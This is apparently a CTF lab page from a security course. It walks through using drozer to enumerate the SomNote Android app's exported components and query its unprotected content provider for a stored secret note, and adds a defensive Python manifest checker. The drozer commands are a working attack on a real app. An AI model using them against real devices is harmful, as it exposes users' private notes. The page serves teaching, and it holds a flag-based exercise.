M 503: SomNote Vulnerable Content Provider (15 pts)

What You Need for This Project

Purpose

To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page.

Drozer allows you to audit IPC endpoints.

SomNote

Install the app, as shown below.

If you can't get the app from Google Play, download my archived copy.

Click "LOGIN WITH EMAIL", enter any email and password, and click the Login button.

Responsible Disclosure

I notified SomCloud of problems years ago:

Putting a Secret into SomNote

On your Android device, launch SomNote.

If it asks for permissions, grant them.

In the login screen, as shown below, at the top right, click X.

A "VIP Previliges" box appears. At the top right, click X to close it.

Click "Get started with SomNote", as shown below.

On the next screen, at the top right, click the + sign.

Type in a secret message, as shown below, and click Save.

At the lower right of your Android device, click the square button.

Close SomNote.

Attacking SomNote with Drozer

Retrieving Package Information

On Kali, execute these commands. The first two run at the Kali shell prompt; the third runs at the dz> prompt that drozer opens:
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f som 
Drozer finds the package name of the SomNote app, which is

com.somcloud.somnote

as shown below.

Identifying the Attack Surface

To see which components the app exposes through Android’s built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:
run app.package.attacksurface com.somcloud.somnote 
There are a lot of exported items, as shown below.

Reading from the Content Provider

On Kali, at the dz> prompt, execute this command:
run app.provider.info -a com.somcloud.somnote 
Drozer shows the content provider's name and reports that no permissions are required to read from it, as shown below.

Finding URIs

On Kali, at the dz> prompt, execute this command:
run scanner.provider.finduris -a com.somcloud.somnote 
Drozer finds four URIs, as shown below.

Querying the Content Provider

On Kali, at the dz> prompt, execute this command:
run app.provider.query content://com.somcloud.provider.SomNote/notes/ 
Drozer finds the secret information, as shown below.
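
The condition found in the steps above (a provider that is exported and needs no read permission) can be checked from the defender's side before an app ships. This is an added example, not part of the original project or of drozer: a Python script that reads a decoded AndroidManifest.xml and lists such providers. The manifest and its com.example.notes names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest (decoded text form); all names are hypothetical.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-sdk android:targetSdkVersion="16"/>
  <application>
    <provider android:name=".OpenNotes" android:exported="true"
              android:authorities="com.example.notes.open"/>
    <provider android:name=".LegacyNotes"
              android:authorities="com.example.notes.legacy"/>
    <provider android:name=".GuardedNotes" android:exported="true"
              android:authorities="com.example.notes.guarded"
              android:readPermission="com.example.notes.READ"/>
    <provider android:name=".PrivateNotes" android:exported="false"
              android:authorities="com.example.notes.private"/>
  </application>
</manifest>"""


def unprotected_providers(manifest_xml):
    """Return authorities of exported providers that any app can read."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    levels = [1]  # minSdkVersion defaults to 1 when it is not declared
    if sdk is not None:
        for attr in ("minSdkVersion", "targetSdkVersion"):
            value = sdk.get(ANDROID + attr)
            if value:
                levels.append(int(value))
    # Providers default to exported only when min and target SDK are both <= 16.
    default_exported = max(levels) <= 16
    findings = []
    for prov in root.iter("provider"):
        flag = prov.get(ANDROID + "exported")
        exported = default_exported if flag is None else flag == "true"
        # android:permission covers read and write; readPermission covers read only.
        guarded = prov.get(ANDROID + "readPermission") or prov.get(ANDROID + "permission")
        if exported and not guarded:
            findings.append(prov.get(ANDROID + "authorities"))
    return findings


if __name__ == "__main__":
    print(unprotected_providers(SAMPLE_MANIFEST))
```

Setting android:exported="false", or requiring a signature-level read permission, removes a provider from this list. The script does not evaluate path-permission entries or the protection level of the permissions it finds.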

M 503.1: Recording Your Success (15 pts)

Find the text covered by a green box in the image above. That's the flag.

Sources

Drozer
drozer user guide

Converted to a CTF 2-28-19
Updated in small ways 2-17-21